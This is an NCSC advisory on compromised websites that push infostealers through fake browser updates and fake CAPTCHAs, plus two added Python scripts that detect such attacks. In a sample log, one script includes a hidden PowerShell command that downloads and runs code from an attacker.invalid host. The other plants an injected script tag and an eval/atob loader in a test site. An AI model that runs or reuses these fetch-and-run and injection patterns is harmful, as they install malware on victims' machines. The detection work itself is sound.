Week 45: How attackers try to spread malware using fraudulent CAPTCHAs and supposed updates

12.11.2024 - Over the past week, the NCSC has received an increasing number of reports about websites that are compromised in order to make visitors believe that the browser needs to be updated or a CAPTCHA needs to be solved. The aim is to infect website visitors' devices with malware.

The current approach involves compromising web servers and manipulating the websites they host so that visitors are enticed into installing malware. The attackers usually gain access to the web servers with stolen credentials. Malicious JavaScript blocks are then injected, redirects are placed or fake plugins are installed in the CMS. The following two examples show the methods used by the attackers:

Bogus browser updates

Figure 1: Request to update an allegedly outdated version of Google Chrome.

The importance of installing updates is generally recognised; so much so that attackers now specifically exploit this expectation to install malware. The infection attempt starts as soon as visitors access the compromised website. Malicious JavaScript code or a malicious plugin is executed and the visitor is redirected to a fake update page. There they are instructed to install the malware on their computer, disguised, for example, as a Google Chrome browser update. The malware is an ‘infostealer’ such as ‘Vidar Stealer’. Vidar collects information about the operating system, account login information, credit card details and browsing history. However, the malware not only collects sensitive data; it can also be used as a downloader for other malware.

Fake CAPTCHAs and a PowerShell script

Figure 2: Fraudulent request to solve a CAPTCHA

Many people are familiar with the request on internet forms to confirm that they are a human being and not a robot. In these tests, known as CAPTCHAs, they may, for example, be asked to solve a maths problem or to select the pictures in a grid that show animals, cars, bridges, etc. However, CAPTCHAs can also be exploited by attackers: website visitors are lured to a fake CAPTCHA page, often via compromised legitimate providers or publicly accessible CAPTCHA services. In these cases, clicking the ‘I am not a robot’ button copies a malicious PowerShell script to the user's clipboard. A PowerShell script is a text file that contains commands for the computer to execute. Users are tricked into pasting and executing this script by pressing the Windows key + R (which opens the Run dialog) and then Ctrl + V. The computer then connects to one of the attackers' servers, and malware is downloaded and installed. The NCSC has been informed that an infostealer known as ‘Lumma Stealer’ is being distributed in this way. Lumma Stealer targets web browsers, cryptocurrency wallets, two-factor authentication extensions and instant messaging services such as Telegram to extract valuable data. Like Vidar Stealer, the malware is also capable of installing additional malware and executing further commands.
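What this technique looks like from the endpoint side, as an added example that is not part of the NCSC report: anything pasted into the Run dialog is started as a child of explorer.exe, so a PowerShell process whose parent is explorer.exe and whose command line combines a hidden window, a download cmdlet and in-memory execution is a strong signal. The script below reads process-creation events in a simplified JSON-lines shape (the field names ts, image, parent_image and cmdline are hypothetical, loosely modelled on Sysmon event 1) and scores each command line against such cues. The sample log is constructed and uses the reserved .invalid domain.

```python
"""Flag PowerShell launches matching the fake-CAPTCHA 'paste into Win+R' pattern.

Added example, not from the NCSC page. Event field names are hypothetical
(loosely modelled on Sysmon event 1) and the sample log is constructed.
"""
import json
import re

# Indicator regexes; insertion order determines the order in the report.
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "web download cmdlet": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "in-memory execution": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    ".NET download method": re.compile(r"download(?:string|file|data)\s*\(", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote URL": re.compile(r"https?://", re.I),
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed sample log (not real telemetry); hosts use the reserved .invalid TLD.
SAMPLE_LOG = r"""
{"ts": "2024-11-12T09:14:02", "image": "C:\\Windows\\explorer.exe", "parent_image": "C:\\Windows\\System32\\userinit.exe", "cmdline": "explorer.exe"}
{"ts": "2024-11-12T09:15:31", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell -w hidden -c \"iwr http://attacker.invalid/a | iex\""}
{"ts": "2024-11-12T09:20:05", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Program Files\\Vendor\\agent.exe", "cmdline": "powershell -File C:\\Scripts\\inventory.ps1"}
{"ts": "2024-11-12T09:22:44", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell"}
"""


def parse_log(text: str) -> list:
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators_for(event: dict) -> list:
    """Names of the indicators matched by a PowerShell command line (empty for other images)."""
    if basename(event.get("image", "")) not in POWERSHELL_IMAGES:
        return []
    cmd = event.get("cmdline", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def from_run_dialog(event: dict) -> bool:
    """The Run dialog is hosted by explorer.exe, so Win+R launches appear as its children."""
    return basename(event.get("parent_image", "")) == "explorer.exe"


def scan(text: str) -> list:
    """Return one finding per PowerShell launch that matches at least one indicator."""
    findings = []
    for ev in parse_log(text):
        hits = indicators_for(ev)
        if not hits:
            continue
        run_dialog = from_run_dialog(ev)
        findings.append({
            "ts": ev.get("ts"),
            "cmdline": ev.get("cmdline"),
            "indicators": hits,
            "from_run_dialog": run_dialog,
            # Run-dialog origin plus several cues is the fake-CAPTCHA shape; rate it higher.
            "severity": "high" if run_dialog and len(hits) >= 2 else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ts"], f["indicators"], f["cmdline"])
```

Only the second sample event is reported: the scheduled inventory script launched by a vendor agent matches no cue, and a plain interactive `powershell` typed into Run has nothing to score. In a real deployment the command-line cues should be tuned against the organisation's own administrative scripts, and the same logic can be applied to the Windows RunMRU history when reconstructing what a user pasted.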

Recommendations for internet users

  • be careful when installing programmes. Only download programmes from secure and trustworthy sources;
  • be careful if a pop-up window appears asking you to update your browser or software;
  • be careful with unusual CAPTCHAs;
  • close any window with a potentially harmful pop-up or CAPTCHA;
  • follow the official update guidelines from the browser manufacturer;
  • if you suspect that your computer is infected with malware, contact a specialist or a computer shop;
  • many malware programmes make extensive changes to the system that cannot simply be undone. If an infection is confirmed, the entire system should therefore be reinstalled. Regular backups make it easier to restore your data;
  • change the passwords for all your online accounts (email, social networks, etc.) after reinstallation.

Recommendations for operators of websites

  • check your website for security gaps and make sure that nobody has unauthorised access;
  • activate two-factor authentication for access to your website;
  • clean up your website and remove any unwanted content;
  • regularly update and check your website and the installed plugins;
  • in particular, install available updates for CMS systems and all other software applications as quickly as possible in order to close any potential security gaps immediately.
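For website operators, the checks in the list above ("check your website", "clean up your website and remove any unwanted content") and the injection methods described at the start of the report (injected JavaScript blocks, fake plugins) can be reduced to two routine tasks: keep a hash manifest of the web root taken when the site is known-good and diff it, and scan templates for script tags that load from hosts outside an allowlist or that contain obfuscation primitives. The script below is an added example, not NCSC or CMS-vendor code; it builds a constructed site in a temporary directory, tampers with it the way the report describes, then runs both checks. The allowlisted host, file paths, plugin name and page contents are all hypothetical.

```python
"""Web-root integrity check: hash-manifest diff plus a scan for injected scripts.

Added example running against a constructed site in a temporary directory;
the allowlisted host, paths, plugin name and page contents are hypothetical.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}
# File types that carry HTML or templates and are worth scanning for <script> tags.
TEMPLATE_SUFFIXES = {".html", ".htm", ".php"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\ssrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)
# Obfuscation primitives common in injected loaders (a heuristic, not a signature).
OBFUSCATION_RE = re.compile(r"eval\s*\(|atob\s*\(|String\.fromCharCode|unescape\s*\(", re.I)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every file under root (POSIX-style relative path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Report files added, removed or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def scan_scripts(root: Path) -> list:
    """Flag external scripts from non-allowlisted hosts and obfuscated inline scripts."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in TEMPLATE_SUFFIXES:
            continue
        text = p.read_text(errors="replace")
        rel = p.relative_to(root).as_posix()
        for src in SCRIPT_SRC_RE.findall(text):
            host = urlsplit(src).netloc.lower()      # also handles protocol-relative //host/...
            if host and host not in ALLOWED_SCRIPT_HOSTS:   # no host means a local script
                findings.append({"file": rel, "kind": "external-script", "detail": host})
        for body in INLINE_SCRIPT_RE.findall(text):
            m = OBFUSCATION_RE.search(body)
            if m:
                findings.append({"file": rel, "kind": "inline-script", "detail": m.group(0)})
    return findings


CLEAN_PAGE = ('<html><head><script src="https://cdn.example.com/lib.js"></script></head>'
              '<body><h1>Site</h1></body></html>')
# Constructed tampering: a loader from an unknown host plus an obfuscated inline block.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="//attacker.invalid/loader.js"></script>'
    '<script>eval(atob("Y29uc3RydWN0ZWQ="));</script></body>')


def demo() -> dict:
    """Build a clean site, take a baseline, tamper with it, then diff and scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "index.html").write_text(CLEAN_PAGE)
        (root / "js" / "app.js").write_text("console.log('app');")
        baseline = build_manifest(root)          # taken while the site is known-good

        (root / "index.html").write_text(INJECTED_PAGE)           # injected script tags
        plugin = root / "plugins" / "seo-booster"                  # hypothetical fake plugin
        plugin.mkdir(parents=True)
        (plugin / "seo-booster.php").write_text("<?php /* constructed placeholder */ ?>")

        return {"diff": diff_manifest(baseline, build_manifest(root)),
                "findings": scan_scripts(root)}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

The manifest diff reports index.html as modified and the fake plugin as added, and the script scan pins down what changed inside the page: a script loaded from a host not on the allowlist and an inline block built on eval/atob. Two caveats apply in practice: the baseline must be stored off the web server (an attacker with write access to the web root can rewrite it), and the manifest should exclude directories the CMS legitimately writes to at runtime (uploads, caches), otherwise every diff is noise.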

https://www.ncsc.admin.ch/content/ncsc/en/home/aktuell/im-fokus/2024/wochenrueckblick_45.html